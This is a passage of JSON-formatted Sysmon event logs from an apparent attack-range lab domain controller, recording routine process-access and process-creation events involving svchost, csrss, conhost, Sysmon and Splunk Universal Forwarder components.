C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:51.574\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-027F-5F25-0000-00103CED0500}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:51.574","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-027F-5F25-0000-00103CED0500}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.919\r\nProcessGuid: {A837DB8D-0280-5F25-0000-00102DEF0500}\r\nProcessId: 3852\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.919","ProcessGuid":"{A837DB8D-0280-5F25-0000-00102DEF0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0280-5F25-0000-00102DEF0500}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0280-5F25-0000-00102DEF0500}","TargetProcessId":"3852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0280-5F25-0000-00102DEF0500}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0280-5F25-0000-00102DEF0500}","TargetProcessId":"3852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:52.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:52.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
